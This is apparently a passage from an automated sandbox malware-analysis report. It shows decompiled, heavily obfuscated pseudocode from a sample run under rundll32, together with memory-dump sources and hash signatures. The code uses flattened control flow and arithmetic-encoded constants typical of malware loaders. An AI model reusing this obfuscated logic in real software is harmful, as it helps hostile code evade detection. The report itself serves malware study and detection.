                                                                                                                                  				_v32 = _v32 / _t366;
                                                                                                                                  				_v32 = _v32 * 0x2e;
                                                                                                                                  				_v32 = _v32 ^ 0x0037cfdf;
                                                                                                                                  				_v108 = 0x851b7a;
                                                                                                                                  				_v108 = _v108 | 0xf3ff5f40;
                                                                                                                                  				_v108 = _v108 ^ 0xf3fc1521;
                                                                                                                                  				_v76 = 0x86d28f;
                                                                                                                                  				_v76 = _v76 >> 0xd;
                                                                                                                                  				_v76 = _v76 ^ 0x000a85f2;
                                                                                                                                  				_v48 = 0x8a8988;
                                                                                                                                  				_v48 = _v48 + 0xffff9d54;
                                                                                                                                  				_v48 = _v48 + 0xffffb441;
                                                                                                                                  				_v48 = _v48 ^ 0x008c2bbe;
                                                                                                                                  				_v80 = 0x3fe2a4;
                                                                                                                                  				_v80 = _v80 ^ 0x5e00b743;
                                                                                                                                  				_v80 = _v80 ^ 0x5e39b1b0;
                                                                                                                                  				_v116 = 0x4ea08b;
                                                                                                                                  				_v116 = _v116 + 0xffffca32;
                                                                                                                                  				_v116 = _v116 ^ 0x00427ef9;
                                                                                                                                  				_v104 = 0xba6181;
                                                                                                                                  				_v104 = _v104 + 0xf529;
                                                                                                                                  				_v104 = _v104 ^ 0x00b33727;
                                                                                                                                  				_v52 = 0x1e8210;
                                                                                                                                  				_v52 = _v52 >> 8;
                                                                                                                                  				_v52 = _v52 | 0xffb97487;
                                                                                                                                  				_v52 = _v52 ^ 0xffb16a42;
                                                                                                                                  				_v40 = 0xeabfd3;
                                                                                                                                  				_v40 = _v40 ^ 0x26644279;
                                                                                                                                  				_t367 = 0x3a;
                                                                                                                                  				_v40 = _v40 / _t367;
                                                                                                                                  				_v40 = _v40 ^ 0x00a36ea5;
                                                                                                                                  				_v12 = 0xc9f67b;
                                                                                                                                  				_v12 = _v12 + 0x836b;
                                                                                                                                  				_v12 = _v12 | 0xa1408986;
                                                                                                                                  				_t368 = 0x45;
                                                                                                                                  				_v12 = _v12 * 0x75;
                                                                                                                                  				_v12 = _v12 ^ 0xf1cc1c9a;
                                                                                                                                  				_v36 = 0x1f6921;
                                                                                                                                  				_v36 = _v36 ^ 0x9bf749ed;
                                                                                                                                  				_v36 = _v36 / _t368;
                                                                                                                                  				_v36 = _v36 ^ 0x024ed910;
                                                                                                                                  				_v64 = 0x37ccf2;
                                                                                                                                  				_v64 = _v64 + 0xfffff775;
                                                                                                                                  				_t369 = 0x19;
                                                                                                                                  				_v64 = _v64 * 0x24;
                                                                                                                                  				_v64 = _v64 ^ 0x07d7b77b;
                                                                                                                                  				_v28 = 0x370f8;
                                                                                                                                  				_v28 = _v28 << 0xd;
                                                                                                                                  				_v28 = _v28 + 0x6470;
                                                                                                                                  				_v28 = _v28 >> 1;
                                                                                                                                  				_v28 = _v28 ^ 0x37097055;
                                                                                                                                  				_v20 = 0x84152c;
                                                                                                                                  				_v20 = _v20 * 0x7e;
                                                                                                                                  				_v20 = _v20 / _t369;
                                                                                                                                  				_v20 = _v20 << 0xe;
                                                                                                                                  				_v20 = _v20 ^ 0x6c90d6a3;
                                                                                                                                  				_v60 = 0x687dd9;
                                                                                                                                  				_t370 = 0xc;
                                                                                                                                  				_v60 = _v60 * 0x1d;
                                                                                                                                  				_v60 = _v60 << 7;
                                                                                                                                  				_v60 = _v60 ^ 0xeb212648;
                                                                                                                                  				_v84 = 0xd09924;
                                                                                                                                  				_v84 = _v84 * 0x7c;
                                                                                                                                  				_v84 = _v84 ^ 0x650614c5;
                                                                                                                                  				_v100 = 0x3804f2;
                                                                                                                                  				_v100 = _v100 | 0x9eb8052c;
                                                                                                                                  				_v100 = _v100 ^ 0x9eb506d7;
                                                                                                                                  				_v92 = 0xf492b0;
                                                                                                                                  				_v92 = _v92 + 0xffffc4ae;
                                                                                                                                  				_v92 = _v92 ^ 0x00fafa5e;
                                                                                                                                  				_v16 = 0xd0e41e;
                                                                                                                                  				_v16 = _v16 * 0x3d;
                                                                                                                                  				_v16 = _v16 >> 0xd;
                                                                                                                                  				_v16 = _v16 >> 0xe;
                                                                                                                                  				_v16 = _v16 ^ 0x000dc1c9;
                                                                                                                                  				_v24 = 0x66d2fe;
                                                                                                                                  				_v24 = _v24 / _t370;
                                                                                                                                  				_v24 = _v24 + 0xffffccd2;
                                                                                                                                  				_v24 = _v24 ^ 0x0a93dd72;
                                                                                                                                  				_v24 = _v24 ^ 0x0a9c564f;
                                                                                                                                  				_v72 = 0xbcf4e;
                                                                                                                                  				_v72 = _v72 >> 7;
                                                                                                                                  				_v72 = _v72 ^ 0x000c8ddf;
                                                                                                                                  				_t364 = _v72;
                                                                                                                                  				_v68 = 0x4616df;
                                                                                                                                  				_v68 = _v68 + 0x9c8e;
                                                                                                                                  				_v68 = _v68 + 0xaaef;
                                                                                                                                  				_v68 = _v68 ^ 0x004c065d;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t353 = 0x2e;
                                                                                                                                  					L2:
                                                                                                                                  					while(_t319 != 0x21229d9) {
                                                                                                                                  						if(_t319 == 0x338c922) {
                                                                                                                                  							_v136 = _t317;
                                                                                                                                  							_t319 = 0x9035918;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						if(_t319 == 0x5b964d8) {
                                                                                                                                  							__eflags = _v756 & _v44;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								_t306 = _a16( &_v756,  &_v160);
                                                                                                                                  								asm("sbb ecx, ecx");
                                                                                                                                  								_t324 =  ~_t306 & 0x09c7cc54;
                                                                                                                                  								L9:
                                                                                                                                  								_t319 = _t324 + 0x21229d9;
                                                                                                                                  								while(1) {
                                                                                                                                  									L1:
                                                                                                                                  									_t353 = 0x2e;
                                                                                                                                  									goto L2;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							__eflags = _v712 - _t353;
                                                                                                                                  							if(_v712 != _t353) {
                                                                                                                                  								L19:
                                                                                                                                  								__eflags = _a24;
                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                  									_push(_v104);
                                                                                                                                  									_push(_v116);
                                                                                                                                  									_t312 = E002EDCF7(_v80, 0x2d17a0, __eflags);
                                                                                                                                  									_pop(_t327);
                                                                                                                                  									E002D47CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
                                                                                                                                  									E002D9DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
                                                                                                                                  									_t310 = E002DA8B0(_v100, _t312, _v92);
                                                                                                                                  									_t374 = _t374 + 0x3c;
                                                                                                                                  									_t353 = 0x2e;
                                                                                                                                  								}
                                                                                                                                  								L18:
                                                                                                                                  								_t319 = 0xbd9f62d;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _v710;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _v710 - _t353;
                                                                                                                                  							if(_v710 != _t353) {
                                                                                                                                  								goto L19;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _v708;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								goto L19;
                                                                                                                                  							}
                                                                                                                                  							goto L18;
                                                                                                                                  						}
                                                                                                                                  						if(_t319 == 0x9035918) {
                                                                                                                                  							_push(_v112);
                                                                                                                                  							_push(_v88);
                                                                                                                                  							E002DA918(_t317, __eflags, _v8, _v96, E002EDCF7(_v56, 0x2d1770, __eflags), _v124,  &_v1796);
                                                                                                                                  							_t374 = _t374 + 0x1c;
                                                                                                                                  							_t310 = E002DA8B0(_v120, _t307, _v32);
                                                                                                                                  							_t319 = 0xb066d4a;
                                                                                                                                  							while(1) {
                                                                                                                                  								L1:
                                                                                                                                  								_t353 = 0x2e;
                                                                                                                                  								goto L2;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						if(_t319 == 0xb066d4a) {
                                                                                                                                  							_t310 = E002D7E00(_v108,  &_v756, _v76, _v48,  &_v1796);
                                                                                                                                  							_t364 = _t310;
                                                                                                                                  							_t374 = _t374 + 0xc;
                                                                                                                                  							__eflags = _t310 - 0xffffffff;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								L25:
                                                                                                                                  								return _t310;
                                                                                                                                  							}
                                                                                                                                  							_t319 = 0x5b964d8;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  						if(_t319 != 0xbd9f62d) {
                                                                                                                                  							L24:
                                                                                                                                  							__eflags = _t319 - 0xa89df2;
                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							goto L25;
                                                                                                                                  						}
                                                                                                                                  						_t310 = E002D4635(_v16,  &_v756, _t364, _v24);
                                                                                                                                  						asm("sbb ecx, ecx");
                                                                                                                                  						_t324 =  ~_t310 & 0x03a73aff;
                                                                                                                                  						goto L9;
                                                                                                                                  					}
                                                                                                                                  					E002D8ABF(_t364, _v72, _v68);
                                                                                                                                  					_t319 = 0xa89df2;
                                                                                                                                  					_t353 = 0x2e;
                                                                                                                                  					goto L24;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x002da03b
                                                                                                                                  0x002da03f
                                                                                                                                  0x002da046
                                                                                                                                  0x002da051
                                                                                                                                  0x002da052
                                                                                                                                  0x002da055
                                                                                                                                  0x002da059
                                                                                                                                  0x002da060
                                                                                                                                  0x002da06b
                                                                                                                                  0x002da06e
                                                                                                                                  0x002da075
                                                                                                                                  0x002da07c
                                                                                                                                  0x002da083
                                                                                                                                  0x002da08a
                                                                                                                                  0x002da091
                                                                                                                                  0x002da098
                                                                                                                                  0x002da09f
                                                                                                                                  0x002da0aa
                                                                                                                                  0x002da0ad
                                                                                                                                  0x002da0b1
                                                                                                                                  0x002da0b5
                                                                                                                                  0x002da0bc
                                                                                                                                  0x002da0c8
                                                                                                                                  0x002da0cb
                                                                                                                                  0x002da0d2
                                                                                                                                  0x002da0d9
                                                                                                                                  0x002da0e0
                                                                                                                                  0x002da0e7
                                                                                                                                  0x002da0eb
                                                                                                                                  0x002da0f2
                                                                                                                                  0x002da0f5
                                                                                                                                  0x002da0fc
                                                                                                                                  0x002da103
                                                                                                                                  0x002da10a
                                                                                                                                  0x002da111
                                                                                                                                  0x002da111
                                                                                                                                  0x002da113
                                                                                                                                  0x00000000
                                                                                                                                  0x002da114
                                                                                                                                  0x002da126
                                                                                                                                  0x002da2d3
                                                                                                                                  0x002da2d9
                                                                                                                                  0x00000000
                                                                                                                                  0x002da2d9
                                                                                                                                  0x002da132
                                                                                                                                  0x002da1fa
                                                                                                                                  0x002da200
                                                                                                                                  0x002da2bf
                                                                                                                                  0x002da2c6
                                                                                                                                  0x002da2c8
                                                                                                                                  0x002da174
                                                                                                                                  0x002da174
                                                                                                                                  0x002da111
                                                                                                                                  0x002da111
                                                                                                                                  0x002da113
                                                                                                                                  0x00000000
                                                                                                                                  0x002da113
                                                                                                                                  0x002da111
                                                                                                                                  0x002da206
                                                                                                                                  0x002da20d
                                                                                                                                  0x002da236
                                                                                                                                  0x002da236
                                                                                                                                  0x002da23a
                                                                                                                                  0x002da23c
                                                                                                                                  0x002da244
                                                                                                                                  0x002da24a
                                                                                                                                  0x002da250
                                                                                                                                  0x002da273
                                                                                                                                  0x002da294
                                                                                                                                  0x002da2a1
                                                                                                                                  0x002da2a6
                                                                                                                                  0x002da2ab
                                                                                                                                  0x002da2ab
                                                                                                                                  0x002da22c
                                                                                                                                  0x002da22c
                                                                                                                                  0x00000000
                                                                                                                                  0x002da22c
                                                                                                                                  0x002da20f
                                                                                                                                  0x002da217
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da219
                                                                                                                                  0x002da220
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da222
                                                                                                                                  0x002da22a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da22a
                                                                                                                                  0x002da13e
                                                                                                                                  0x002da1af
                                                                                                                                  0x002da1b7
                                                                                                                                  0x002da1d7
                                                                                                                                  0x002da1dc
                                                                                                                                  0x002da1e7
                                                                                                                                  0x002da1ed
                                                                                                                                  0x002da111
                                                                                                                                  0x002da111
                                                                                                                                  0x002da113
                                                                                                                                  0x00000000
                                                                                                                                  0x002da113
                                                                                                                                  0x002da111
                                                                                                                                  0x002da146
                                                                                                                                  0x002da192
                                                                                                                                  0x002da197
                                                                                                                                  0x002da199
                                                                                                                                  0x002da19c
                                                                                                                                  0x002da19f
                                                                                                                                  0x002da30b
                                                                                                                                  0x002da30b
                                                                                                                                  0x002da30b
                                                                                                                                  0x002da1a5
                                                                                                                                  0x00000000
                                                                                                                                  0x002da1a5
                                                                                                                                  0x002da14e
                                                                                                                                  0x002da2f9
                                                                                                                                  0x002da2f9
                                                                                                                                  0x002da2ff
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002da2ff
                                                                                                                                  0x002da161
                                                                                                                                  0x002da16c
                                                                                                                                  0x002da16e
                                                                                                                                  0x00000000
                                                                                                                                  0x002da16e
                                                                                                                                  0x002da2eb
                                                                                                                                  0x002da2f3
                                                                                                                                  0x002da2f8
                                                                                                                                  0x00000000
                                                                                                                                  0x002da2f8

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: H&!$Up7$yBd&
                                                                                                                                  • API String ID: 0-2352930472
                                                                                                                                  • Opcode ID: f51d7b9375ecb25cc5626e3b8ddf3e74eca4fcf07fbbdaa1e29b436d902c38dc
                                                                                                                                  • Instruction ID: 5a33932e1bef1861a69759b38ee809becfd15a10d3c76b75550efd9280a059a8
                                                                                                                                  • Opcode Fuzzy Hash: f51d7b9375ecb25cc5626e3b8ddf3e74eca4fcf07fbbdaa1e29b436d902c38dc
                                                                                                                                  • Instruction Fuzzy Hash: 11E17671D0021EDBCF28DFE1D98A8EEBBB1FB44314F20815AE516BA264D7B40A95CF41
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002E95FA() {
                                                                                                                                  				char _v524;
                                                                                                                                  				signed int _v532;
                                                                                                                                  				intOrPtr _v536;
                                                                                                                                  				intOrPtr _v540;
                                                                                                                                  				intOrPtr _v544;
                                                                                                                                  				intOrPtr _v548;
                                                                                                                                  				intOrPtr _v552;
                                                                                                                                  				intOrPtr _v556;
                                                                                                                                  				intOrPtr _v560;
                                                                                                                                  				char _v564;
                                                                                                                                  				intOrPtr _v568;
                                                                                                                                  				char _v572;
                                                                                                                                  				signed int _v576;
                                                                                                                                  				signed int _v580;
                                                                                                                                  				signed int _v584;
                                                                                                                                  				signed int _v588;
                                                                                                                                  				signed int _v592;
                                                                                                                                  				signed int _v596;
                                                                                                                                  				signed int _v600;
                                                                                                                                  				signed int _v604;
                                                                                                                                  				signed int _v608;
                                                                                                                                  				signed int _v612;
                                                                                                                                  				signed int _v616;
                                                                                                                                  				signed int _v620;
                                                                                                                                  				signed int _v624;
                                                                                                                                  				signed int _v628;
                                                                                                                                  				signed int _v632;
                                                                                                                                  				signed int _v636;
                                                                                                                                  				signed int _v640;
                                                                                                                                  				signed int _v644;
                                                                                                                                  				signed int _v648;
                                                                                                                                  				signed int _v652;
                                                                                                                                  				signed int _v656;
                                                                                                                                  				signed int _v660;
                                                                                                                                  				signed int _v664;
                                                                                                                                  				signed int _v668;
                                                                                                                                  				signed int _v672;
                                                                                                                                  				signed int _v676;
                                                                                                                                  				signed int _v680;
                                                                                                                                  				signed int _v684;
                                                                                                                                  				signed int _v688;
                                                                                                                                  				intOrPtr _t295;
                                                                                                                                  				void* _t297;
                                                                                                                                  				void* _t298;
                                                                                                                                  				intOrPtr _t299;
                                                                                                                                  				signed int _t306;
                                                                                                                                  				void* _t309;
                                                                                                                                  				void* _t310;
                                                                                                                                  				char _t311;
                                                                                                                                  				void* _t317;
                                                                                                                                  				intOrPtr _t334;
                                                                                                                                  				signed int _t341;
                                                                                                                                  				signed int _t342;
                                                                                                                                  				signed int _t343;
                                                                                                                                  				signed int _t344;
                                                                                                                                  				void* _t347;
                                                                                                                                  
                                                                                                                                  				_v668 = 0xe6fb93;
                                                                                                                                  				_v668 = _v668 + 0xffff1eed;
                                                                                                                                  				_t310 = 0xada6804;
                                                                                                                                  				_v668 = _v668 * 0x61;
                                                                                                                                  				_t309 = 0;
                                                                                                                                  				_v668 = _v668 ^ 0xaca28cc6;
                                                                                                                                  				_v668 = _v668 ^ 0xfb928647;
                                                                                                                                  				_v616 = 0x8caf33;
                                                                                                                                  				_t341 = 0x42;
                                                                                                                                  				_v616 = _v616 * 0x25;
                                                                                                                                  				_v616 = _v616 * 0x4f;
                                                                                                                                  				_v616 = _v616 ^ 0x46546a51;
                                                                                                                                  				_v620 = 0x861136;
                                                                                                                                  				_v620 = _v620 | 0x52f06d4d;
                                                                                                                                  				_v620 = _v620 >> 0xf;
                                                                                                                                  				_v620 = _v620 ^ 0x0000a5ef;
                                                                                                                                  				_v628 = 0x4cf396;
                                                                                                                                  				_v628 = _v628 >> 1;
                                                                                                                                  				_v628 = _v628 >> 9;
                                                                                                                                  				_v628 = _v628 ^ 0x0000133c;
                                                                                                                                  				_v684 = 0xc54e58;
                                                                                                                                  				_v684 = _v684 >> 2;
                                                                                                                                  				_v684 = _v684 ^ 0xb8bf25ee;
                                                                                                                                  				_v684 = _v684 >> 2;
                                                                                                                                  				_v684 = _v684 ^ 0x2e259ad3;
                                                                                                                                  				_v592 = 0x68267f;
                                                                                                                                  				_v592 = _v592 + 0xffff39c4;
                                                                                                                                  				_v592 = _v592 ^ 0x006c60f9;
                                                                                                                                  				_v632 = 0xa1d089;
                                                                                                                                  				_v632 = _v632 / _t341;
                                                                                                                                  				_v632 = _v632 ^ 0x52222b14;
                                                                                                                                  				_v632 = _v632 ^ 0x5220bcfc;
                                                                                                                                  				_v608 = 0x39d352;
                                                                                                                                  				_v608 = _v608 | 0x2e7e1ae1;
                                                                                                                                  				_v608 = _v608 ^ 0x576cc274;
                                                                                                                                  				_v608 = _v608 ^ 0x7911cf35;
                                                                                                                                  				_v660 = 0xc26f36;
                                                                                                                                  				_v660 = _v660 ^ 0x9f5dc88a;
                                                                                                                                  				_v660 = _v660 ^ 0xeefda613;
                                                                                                                                  				_t342 = 0x3f;
                                                                                                                                  				_v660 = _v660 / _t342;
                                                                                                                                  				_v660 = _v660 ^ 0x01ce77bb;
                                                                                                                                  				_v624 = 0x334861;
                                                                                                                                  				_v624 = _v624 + 0xffff4b1a;
                                                                                                                                  				_t343 = 0x2a;
                                                                                                                                  				_v624 = _v624 * 0x2f;
                                                                                                                                  				_v624 = _v624 ^ 0x0947e580;
                                                                                                                                  				_v652 = 0xab72b9;
                                                                                                                                  				_v652 = _v652 << 8;
                                                                                                                                  				_v652 = _v652 / _t343;
                                                                                                                                  				_v652 = _v652 ^ 0x0419701b;
                                                                                                                                  				_v688 = 0x507748;
                                                                                                                                  				_v688 = _v688 << 5;
                                                                                                                                  				_v688 = _v688 + 0xffff449a;
                                                                                                                                  				_v688 = _v688 + 0xb858;
                                                                                                                                  				_v688 = _v688 ^ 0x0a0a66f0;
                                                                                                                                  				_v600 = 0x95cabc;
                                                                                                                                  				_v600 = _v600 + 0xffffb185;
                                                                                                                                  				_v600 = _v600 << 9;
                                                                                                                                  				_v600 = _v600 ^ 0x2af43595;
                                                                                                                                  				_v580 = 0x7e3ec7;
                                                                                                                                  				_v580 = _v580 ^ 0x09caac24;
                                                                                                                                  				_v580 = _v580 ^ 0x09b70662;
                                                                                                                                  				_v612 = 0xa526a8;
                                                                                                                                  				_v612 = _v612 | 0x64dab874;
                                                                                                                                  				_v612 = _v612 >> 0xe;
                                                                                                                                  				_v612 = _v612 ^ 0x0006f9eb;
                                                                                                                                  				_v604 = 0xb7de18;
                                                                                                                                  				_t344 = 0x48;
                                                                                                                                  				_v604 = _v604 * 0x79;
                                                                                                                                  				_v604 = _v604 * 0x31;
                                                                                                                                  				_v604 = _v604 ^ 0xa26ee4e9;
                                                                                                                                  				_v640 = 0x553c00;
                                                                                                                                  				_v640 = _v640 + 0xffff4196;
                                                                                                                                  				_v640 = _v640 + 0xffff8daf;
                                                                                                                                  				_v640 = _v640 ^ 0x00577a07;
                                                                                                                                  				_v576 = 0xaac37;
                                                                                                                                  				_v576 = _v576 * 0x77;
                                                                                                                                  				_v576 = _v576 ^ 0x04fc3a71;
                                                                                                                                  				_v676 = 0xb6ce7b;
                                                                                                                                  				_v676 = _v676 >> 1;
                                                                                                                                  				_v676 = _v676 * 0x28;
                                                                                                                                  				_v676 = _v676 >> 0xb;
                                                                                                                                  				_v676 = _v676 ^ 0x000b20b4;
                                                                                                                                  				_v584 = 0x4877b4;
                                                                                                                                  				_v584 = _v584 << 1;
                                                                                                                                  				_v584 = _v584 ^ 0x009148e9;
                                                                                                                                  				_v588 = 0xaf1c90;
                                                                                                                                  				_v588 = _v588 * 0x5b;
                                                                                                                                  				_v588 = _v588 ^ 0x3e3937c6;
                                                                                                                                  				_v644 = 0x150bb3;
                                                                                                                                  				_v644 = _v644 + 0x865c;
                                                                                                                                  				_v644 = _v644 + 0x5404;
                                                                                                                                  				_v644 = _v644 ^ 0x001dce65;
                                                                                                                                  				_v648 = 0xaa3958;
                                                                                                                                  				_v648 = _v648 / _t344;
                                                                                                                                  				_v648 = _v648 >> 0xe;
                                                                                                                                  				_v648 = _v648 ^ 0x000a9525;
                                                                                                                                  				_v596 = 0xdb2add;
                                                                                                                                  				_v596 = _v596 << 0xd;
                                                                                                                                  				_v596 = _v596 ^ 0x65528fd4;
                                                                                                                                  				_v680 = 0xd04d0c;
                                                                                                                                  				_v680 = _v680 << 5;
                                                                                                                                  				_t340 = _v596;
                                                                                                                                  				_v680 = _v680 * 0x55;
                                                                                                                                  				_v680 = _v680 | 0x96843ebb;
                                                                                                                                  				_v680 = _v680 ^ 0xb7be4a39;
                                                                                                                                  				_v656 = 0x2591b4;
                                                                                                                                  				_v656 = _v656 ^ 0x7517a4f1;
                                                                                                                                  				_v656 = _v656 ^ 0xb20365ef;
                                                                                                                                  				_v656 = _v656 + 0xffff4c4f;
                                                                                                                                  				_v656 = _v656 ^ 0xc733773b;
                                                                                                                                  				_v636 = 0xbfc674;
                                                                                                                                  				_v636 = _v636 * 0x1d;
                                                                                                                                  				_v636 = _v636 << 6;
                                                                                                                                  				_v636 = _v636 ^ 0x6e5b8cbc;
                                                                                                                                  				_v664 = 0x3235cc;
                                                                                                                                  				_v664 = _v664 << 1;
                                                                                                                                  				_v664 = _v664 | 0x857b9d7f;
                                                                                                                                  				_v664 = _v664 * 0x28;
                                                                                                                                  				_v664 = _v664 ^ 0xdbf98c50;
                                                                                                                                  				_v672 = 0xb181ad;
                                                                                                                                  				_v672 = _v672 >> 0xa;
                                                                                                                                  				_v672 = _v672 << 2;
                                                                                                                                  				_v672 = _v672 ^ 0xdb7e6d02;
                                                                                                                                  				_v672 = _v672 ^ 0xdb78e9e9;
                                                                                                                                  				do {
                                                                                                                                  					while(_t310 != 0x10c1a7f) {
                                                                                                                                  						if(_t310 == 0x31db0c0) {
                                                                                                                                  							_t311 = _v572;
                                                                                                                                  							_t295 = _v568;
                                                                                                                                  							_push(_t311);
                                                                                                                                  							_v560 = _t295;
                                                                                                                                  							_v552 = _t295;
                                                                                                                                  							_v544 = _t295;
                                                                                                                                  							_v536 = _t295;
                                                                                                                                  							_v564 = _t311;
                                                                                                                                  							_v556 = _t311;
                                                                                                                                  							_v548 = _t311;
                                                                                                                                  							_v540 = _t311;
                                                                                                                                  							_v532 = _v628;
                                                                                                                                  							_t297 = E002D5DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
                                                                                                                                  							_t347 = _t347 + 0x18;
                                                                                                                                  							__eflags = _t297;
                                                                                                                                  							_t309 =  !=  ? 1 : _t309;
                                                                                                                                  							_t310 = 0x48f7cbb;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t310 == 0x461819e) {
                                                                                                                                  								_push(_v660);
                                                                                                                                  								_push(_v608);
                                                                                                                                  								_t298 = E002EDCF7(_v632, 0x2d1000, __eflags);
                                                                                                                                  								_pop(_t317);
                                                                                                                                  								_t299 =  *0x2f3e10; // 0x0
                                                                                                                                  								_t334 =  *0x2f3e10; // 0x0
                                                                                                                                  								E002D47CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
                                                                                                                                  								E002DA8B0(_v612, _t298, _v604);
                                                                                                                                  								_t347 = _t347 + 0x24;
                                                                                                                                  								_t310 = 0xa22489e;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t310 == 0x48f7cbb) {
                                                                                                                                  									E002E1E67(_v656, _v636, _v664, _v672, _t340);
                                                                                                                                  								} else {
                                                                                                                                  									if(_t310 == 0xa22489e) {
                                                                                                                                  										_t306 = E002D8F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
                                                                                                                                  										_t340 = _t306;
                                                                                                                                  										_t347 = _t347 + 0x28;
                                                                                                                                  										__eflags = _t306 - 0xffffffff;
                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                  											_t310 = 0x31db0c0;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									} else {
                                                                                                                                  										if(_t310 == 0xada6804) {
                                                                                                                                  											_t310 = 0xcbcd90e;
                                                                                                                                  											continue;
                                                                                                                                  										} else {
                                                                                                                                  											if(_t310 != 0xcbcd90e) {
                                                                                                                                  												goto L15;
                                                                                                                                  											} else {
                                                                                                                                  												E002EC1EC(_v684, _v592,  &_v572);
                                                                                                                                  												_t310 = 0x10c1a7f;
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L18:
                                                                                                                                  						return _t309;
                                                                                                                                  					}
                                                                                                                                  					_v572 = _v572 - E002EABD1();
                                                                                                                                  					_t310 = 0x461819e;
                                                                                                                                  					asm("sbb [esp+0x8c], edx");
                                                                                                                                  					L15:
                                                                                                                                  					__eflags = _t310 - 0x7e6efe8;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L18;
                                                                                                                                  			}




























































                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: HwP$QjTF$aH3
                                                                                                                                  • API String ID: 0-3950587752
                                                                                                                                  • Opcode ID: dae5bfa37d413455ae591c3b9dc314ef0363cef58e7a45c43ba671c572cbaeb6
                                                                                                                                  • Instruction ID: dccebf667bbf80b137c9a6b393d1f1ef86364b4808ead34abcf391de949af3db
                                                                                                                                  • Opcode Fuzzy Hash: dae5bfa37d413455ae591c3b9dc314ef0363cef58e7a45c43ba671c572cbaeb6
                                                                                                                                  • Instruction Fuzzy Hash: 24E11F714093819FD368CF25C58A65BBBE1FFC4748F608A1EF29686260D7B18989CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002DB2C7(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				char _v40;
                                                                                                                                  				char _v48;
                                                                                                                                  				intOrPtr _v72;
                                                                                                                                  				intOrPtr _v80;
                                                                                                                                  				intOrPtr _v84;
                                                                                                                                  				intOrPtr _v92;
                                                                                                                                  				char _v108;
                                                                                                                                  				char _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				void* _t137;
                                                                                                                                  				intOrPtr* _t157;
                                                                                                                                  				signed int _t166;
                                                                                                                                  				void* _t173;
                                                                                                                                  				intOrPtr _t191;
                                                                                                                                  				void* _t203;
                                                                                                                                  				void* _t208;
                                                                                                                                  				signed int _t209;
                                                                                                                                  				signed int _t210;
                                                                                                                                  				signed int _t211;
                                                                                                                                  				signed int _t212;
                                                                                                                                  				intOrPtr* _t213;
                                                                                                                                  				void* _t215;
